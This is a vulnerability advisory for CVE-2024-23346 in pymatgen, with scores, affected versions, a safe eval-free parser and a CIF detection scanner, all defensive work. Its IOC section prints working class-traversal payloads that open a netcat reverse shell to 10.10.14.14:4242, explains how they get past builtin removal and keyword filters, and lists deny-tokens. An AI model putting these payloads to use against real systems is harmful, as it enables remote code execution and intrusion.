CVE-2024-23346
published 2024-02-21


Priority: P3 · 54 · high
CVSS 3.1 base score: 7.8 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Exploit: public PoC available
EPSS: 3.82% (88.7th percentile)
Pymatgen (Python Materials Genomics) is an open-source Python library for materials analysis. A critical security vulnerability exists in the `JonesFaithfulTransformation.from_transformation_str()` method within the `pymatgen` library prior to version 2024.2.20. This method insecurely utilizes `eval()` for processing input, enabling execution of arbitrary code when parsing untrusted input. Version 2024.2.20 fixes this issue.
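The description names the root cause (`eval()` on an attacker-controlled transformation string) but not what a safe parser looks like. The following is an added example, not pymatgen's own code: it accepts the same `basis;shift` syntax the method takes (`a,b,c;0,0,0`, `a-b,a+b,2c;1/2,0,0`), parses each basis expression with `ast`, and walks the tree with an allow-list interpreter that knows only numbers, the names `a`, `b`, `c`, unary sign and `+ - * /`. Attribute access, subscripts, calls and comprehensions, including the payloads listed under Detection & IOCs below, raise `ValueError` instead of executing. The `MAX_LEN` cap and the implicit-multiplication regex are this example's own choices, and the column convention for `P` (columns are the new basis vectors) is assumed to match pymatgen's.

```python
import ast
import re
from fractions import Fraction

# Lattice vectors a, b, c as 3-tuples of Fractions; a scalar is a bare Fraction.
BASIS = {
    "a": (Fraction(1), Fraction(0), Fraction(0)),
    "b": (Fraction(0), Fraction(1), Fraction(0)),
    "c": (Fraction(0), Fraction(0), Fraction(1)),
}
MAX_LEN = 256  # defensive cap (this example's assumption): bounds parser work on hostile input

# Insert the '*' crystallographers omit: "2c" -> "2*c", "(a+b)c" -> "(a+b)*c".
_IMPLICIT_MUL = re.compile(r"(?<=[\dabc)])(?=[abc(])")


def _is_vec(x):
    return isinstance(x, tuple)


def _neg(x):
    return tuple(-p for p in x) if _is_vec(x) else -x


def _add(x, y):
    if _is_vec(x) and _is_vec(y):
        return tuple(p + q for p, q in zip(x, y))
    if not _is_vec(x) and not _is_vec(y):
        return x + y
    raise ValueError("cannot add a scalar to a lattice vector")


def _mul(x, y):
    if _is_vec(x) and _is_vec(y):
        raise ValueError("product of two lattice vectors is not allowed")
    if _is_vec(x):
        return tuple(p * y for p in x)
    if _is_vec(y):
        return tuple(x * q for q in y)
    return x * y


def _div(x, y):
    if _is_vec(y) or y == 0:
        raise ValueError("division must be by a non-zero scalar")
    return tuple(p / y for p in x) if _is_vec(x) else x / y


_BINOPS = {ast.Add: _add, ast.Sub: lambda x, y: _add(x, _neg(y)), ast.Mult: _mul, ast.Div: _div}


def _eval_node(node):
    """Allow-list interpreter: only numbers, the names a/b/c, unary +/- and + - * /."""
    if isinstance(node, ast.Expression):
        return _eval_node(node.body)
    if isinstance(node, ast.Constant) and type(node.value) in (int, float):
        return Fraction(node.value)  # floats become exact binary fractions, which is fine here
    if isinstance(node, ast.Name) and node.id in BASIS:
        return BASIS[node.id]
    if isinstance(node, ast.UnaryOp) and isinstance(node.op, (ast.UAdd, ast.USub)):
        value = _eval_node(node.operand)
        return _neg(value) if isinstance(node.op, ast.USub) else value
    if isinstance(node, ast.BinOp) and type(node.op) in _BINOPS:
        return _BINOPS[type(node.op)](_eval_node(node.left), _eval_node(node.right))
    # Attribute, Subscript, Call, ListComp, ... all land here: nothing is ever executed.
    raise ValueError(f"disallowed syntax in transformation string: {type(node).__name__}")


def parse_transformation(s):
    """Parse 'basis;shift' (e.g. 'a-b,a+b,2c;1/2,0,0') into (P, p) without eval().

    P is a 3x3 tuple of Fractions whose columns are the new basis vectors; p is the
    origin shift as three Fractions. Raises ValueError on anything that is not a plain
    linear expression in a, b, c followed by three numeric shift components.
    """
    if len(s) > MAX_LEN:
        raise ValueError("transformation string too long")
    parts = s.split(";")
    if len(parts) != 2:
        raise ValueError("expected exactly one ';' between basis change and origin shift")
    basis_exprs = parts[0].split(",")
    shift_exprs = parts[1].split(",")
    if len(basis_exprs) != 3 or len(shift_exprs) != 3:
        raise ValueError("expected three basis expressions and three shift components")

    columns = []
    for expr in basis_exprs:
        expr = _IMPLICIT_MUL.sub("*", expr.replace(" ", ""))
        try:
            tree = ast.parse(expr, mode="eval")
        except (SyntaxError, ValueError, RecursionError) as exc:
            raise ValueError(f"unparsable basis expression {expr!r}") from exc
        vec = _eval_node(tree)
        if not _is_vec(vec):
            raise ValueError(f"basis expression {expr!r} is a scalar, not a lattice vector")
        columns.append(vec)

    # Fraction("1/2"), Fraction("0.25"), Fraction("-1") are accepted; "a", "[", ... are not.
    p = tuple(Fraction(x.strip()) for x in shift_exprs)
    P = tuple(tuple(columns[j][i] for j in range(3)) for i in range(3))
    return P, p


def is_safe_transformation(s):
    """True if the string parses under the allow-list grammar, False otherwise."""
    try:
        parse_transformation(s)
        return True
    except ValueError:
        return False
```

Note that the interpreter rejects by node type rather than by searching for strings like `__mro__`; an attacker can rewrite the spelling of a payload freely, but cannot express a call or an attribute lookup with only the four arithmetic operators.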

Affected (6 ranges)

Vendor               Product    Version range                                Fixed in
debian               pymatgen   < 2022.11.7+dfsg1-11+deb12u1 (bookworm)      2022.11.7+dfsg1-11+deb12u1 (bookworm)
materialsproject     pymatgen   < 2024.2.20                                  2024.2.20
materialsvirtuallab  pymatgen   < 2024.2.20                                  2024.2.20
pymatgen             pymatgen   >= 0, < 2022.11.7+dfsg1-11+deb12u1           2022.11.7+dfsg1-11+deb12u1
pymatgen             pymatgen   >= 0, < 2024.1.27+dfsg1-6                    2024.1.27+dfsg1-6
pymatgen             pymatgen   >= 0, < 2024.2.20                            2024.2.20

Detection & IOCs (extracted from sources)

filename: exploit.cif
filename: vuln.cif
command: [d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+ ["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("busybox nc 10.10.14.14 4242 -e /bin/bash");0,0,0
command: [d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+ ["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("nc {ip} {port} -e /bin/bash");0,0,0
path: /static/example.cif
other: _space_group_magn.transform_BNS_Pp_abc
  • Malicious CIF files exploiting CVE-2024-23346 carry a crafted `_space_group_magn.transform_BNS_Pp_abc` value that embeds a Python class-traversal payload: starting from `().__class__.__mro__[1]` (i.e. `object`) it enumerates `__subclasses__()` to find `BuiltinImporter`, loads `os` through it and calls `os.system()`. Because the chain reaches `os` without naming a single builtin, removing `__builtins__` from the `eval()` globals does not stop it.
  • Detect CIF uploads whose `_space_group_magn.transform_BNS_Pp_abc` value contains `__mro__` or `BuiltinImporter`; this field is the canonical injection point. Note that the payload above already spells `__subclasses__` as `"__sub" + "classes__"` to dodge substring matching, so the stronger check is to reject any value that is not a plain `basis;shift` transformation string (the letters a/b/c, digits, `+ - * / ( )`, one `;`, three numeric shift components).
  • The `_audit_creation_method` value `CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit` or `Pymatgen CIF Parser Arbitrary Code Execution Exploit` appears verbatim in public PoC files and can be used as a file-content signature. It is trivially changed by an attacker, so treat a match as corroboration, not as the primary rule.
  • The data block identifier `data_5yOhtAoR` is a static string in known PoC CIF files and can serve as a file-content IOC, with the same caveat: it identifies unmodified PoC files, not the vulnerability.
  • The vulnerable code path is `JonesFaithfulTransformation.from_transformation_str()` in pymatgen; monitor for pymatgen versions prior to 2024.2.20 parsing externally supplied CIF files.
  • The reverse-shell IP and port embedded in the payload (`busybox nc 10.10.14.14 4242`) are attacker-controlled and will vary per campaign; do not rely on these specific values for detection.
  • The exploit triggers only when the application actually parses the file (`CifParser.parse_structures()` or an equivalent path that reaches `from_transformation_str()`) on attacker-supplied input; the vulnerability is in parsing, not in file upload itself.
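The detection bullets above, turned into code as an added example (not the page's or any vendor's detection rule): a minimal CIF key/value reader plus a scanner that applies an allow-list to `_space_group_magn.transform_BNS_Pp_abc`, labels the deny-list tokens the bullets mention, and checks the known PoC `_audit_creation_method` strings and the `data_5yOhtAoR` block name as low-confidence corroboration. Both CIF documents are constructed samples; the malicious one mirrors the payload shape listed under Detection & IOCs with the reverse-shell command replaced by `id`. The rule identifiers and the `loop_` limitation are this example's own.

```python
import re

TRANSFORM_TAG = "_space_group_magn.transform_BNS_Pp_abc"
AUDIT_TAG = "_audit_creation_method"

# Allow-list: a legitimate value is three linear expressions in a, b, c, then ';', then
# three numeric (possibly fractional) shift components. Anything else is not crystallography.
_SAFE_TRANSFORM = re.compile(
    r"^[abc\d+\-*/()\s]+(,[abc\d+\-*/()\s]+){2};[\d+\-/.\s]+(,[\d+\-/.\s]+){2}$"
)
# Deny-list tokens, used only to label a finding. The payload on this page already builds
# "__subclasses__" as "__sub" + "classes__", so a substring rule alone is bypassable.
_SUSPICIOUS_TOKENS = ("__", "import", "BuiltinImporter", "load_module", "system", "[", '"', "'")

# Strings seen verbatim in public PoC files (as listed on this page). Trivially changed by an
# attacker, so they corroborate the allow-list finding rather than replace it.
_POC_AUDIT_METHODS = (
    "CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit",
    "Pymatgen CIF Parser Arbitrary Code Execution Exploit",
)
_POC_BLOCK_NAME = "5yOhtAoR"


def _unquote(value):
    value = value.strip()
    if len(value) >= 2 and value[0] == value[-1] and value[0] in "'\"":
        return value[1:-1]
    return value


def extract_cif_fields(text):
    """Minimal CIF reader: returns (data block name, {tag: value}) for top-level tags.

    Handles quoted one-line values and ';'-delimited multi-line text fields. Values inside
    loop_ tables are not collected (caveat: a tag placed in a loop is missed by this reader).
    """
    block_name = None
    fields = {}
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i].strip()
        if line.startswith("data_"):
            block_name = line[len("data_"):]
        elif line.startswith("_"):
            parts = line.split(None, 1)
            tag = parts[0]
            rest = parts[1].strip() if len(parts) > 1 else ""
            if rest:
                fields[tag] = _unquote(rest)
            elif i + 1 < len(lines) and lines[i + 1].startswith(";"):
                buf = [lines[i + 1][1:]]  # multi-line text field: ';' in column 1 opens and closes it
                i += 2
                while i < len(lines) and not lines[i].startswith(";"):
                    buf.append(lines[i])
                    i += 1
                fields[tag] = "\n".join(buf).strip()
            else:
                fields[tag] = ""
        i += 1
    return block_name, fields


def scan_cif(text):
    """Return a list of (rule_id, detail) findings for one CIF document; empty means clean."""
    findings = []
    block_name, fields = extract_cif_fields(text)

    transform = fields.get(TRANSFORM_TAG)
    if transform is not None:
        compact = " ".join(transform.split())  # collapse newlines/whitespace before matching
        if not _SAFE_TRANSFORM.match(compact):
            findings.append(("invalid_transform",
                             f"{TRANSFORM_TAG} is not a plain 'basis;shift' string: {compact[:80]!r}"))
        hits = [t for t in _SUSPICIOUS_TOKENS if t in compact]
        if hits:
            findings.append(("suspicious_token", f"{TRANSFORM_TAG} contains {hits}"))

    audit = fields.get(AUDIT_TAG, "")
    if any(sig in audit for sig in _POC_AUDIT_METHODS):
        findings.append(("poc_audit_method", f"{AUDIT_TAG} matches a known PoC string: {audit!r}"))
    if block_name == _POC_BLOCK_NAME:
        findings.append(("poc_block_name", f"data block name matches known PoC: data_{block_name}"))
    return findings


# Constructed samples, not real uploads. MALICIOUS_CIF mirrors the payload shape on this page
# with the reverse-shell command replaced by `id`.
MALICIOUS_CIF = """\
data_5yOhtAoR
_audit_creation_method   'Pymatgen CIF Parser Arbitrary Code Execution Exploit'
_cell_length_a           5.0
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__(*[().__class__.__mro__[1]]+["__sub"+"classes__"])() if d.__name__ == "BuiltinImporter"][0].load_module("os").system("id");0,0,0'
"""

BENIGN_CIF = """\
data_constructed_example
_audit_creation_method   'hand-written sample'
_cell_length_a           5.0
_space_group_magn.transform_BNS_Pp_abc 'a-b,a+b,2c;1/2,0,0'
"""

if __name__ == "__main__":
    for name, doc in (("malicious", MALICIOUS_CIF), ("benign", BENIGN_CIF)):
        print(name, scan_cif(doc))
```

The allow-list is the rule that matters: a value such as `'getattr(a, chr(95)*2);0,0,0'` contains none of the dunder tokens and would slip past a substring rule on `__mro__` or `BuiltinImporter`, yet it still fails `_SAFE_TRANSFORM` and is flagged. Run the scanner at the upload boundary and again at parse time, since only the parse actually triggers the bug.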

CVSS provenance

Source          Version   Score   Severity   Vector
nvd             v3.1      7.8     HIGH       CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
osv                       7.8     HIGH
vendor_debian             9.3     CRITICAL